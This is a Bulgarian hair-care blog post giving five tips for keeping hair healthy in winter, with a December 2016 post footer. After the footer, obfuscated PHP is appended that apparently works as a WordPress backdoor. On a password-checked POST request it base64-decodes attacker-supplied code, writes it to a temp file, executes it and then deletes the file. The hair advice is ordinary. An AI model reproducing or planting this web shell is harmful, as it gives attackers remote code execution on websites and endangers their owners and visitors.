5 съвета за здрава коса през зимата | Косопад

5 съвета за здрава коса през зимата

kosa-zima

През зимата косата ни е подложена на агресивното влияние на студа, снега, мъглата.Обикновено заради разликите в температурите, косата ни е щръкнала нагоре, заради статичното електричество, и е невъзможно да я срешем.

Ето 5 много полезни съвета как да запазим косата си красива и през зимата:

1. Избягвайте ежедневното миене на косата. Правете го през ден. Статичното електричество се появява, когато косъма е много порест и не успява да задържи влагата.

2. Не измивайте изцяло балсама или маслата, които използвате, тъй като те действат като предпазен слой срещу топлината. През студените месеци, употребата на уреди като сешоар и преса, е особено вредна. Използвайте продукт, подходящ за вашата коса, който да я предпазва.

kosa-zima-2

3. Оставяйте мократа косата  да съхне по естествен начин, преди да я разрешете или да я оформите с пресата. С колкото по- малко горещ въздух я обработвате, по- добре ще поема овлажняващите елементи от шампоана и балсама.

4. През зимния сезон се старайте да ходите поне един пък в месеца във фризьорския салон за хидратираща маска. Така косата ви ще е здрава и блестяща през целия сезон.

Ако нямате възможност да си го позволите, направете следното: купете си крем за разресване. Разделете косата на кичури, нанесете малко от крема на дланта си и нанесете. Изчакайте пет минути. Раздвижете косата, така че да изглежда естествено. Така косата ви ще е хидратирана и винаги ще изглежда сресана.

5. Заради студа и вятъра, косата ни е постоянно наелекризирана. Затова, си купете продукт срещу фриз на косата. Измийте косата, подсушете добре с кърпа и нанесете на продукта. После се срешете с четка, така че косата ви да изглежда добре.

17. декември 2016 16:26:41 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}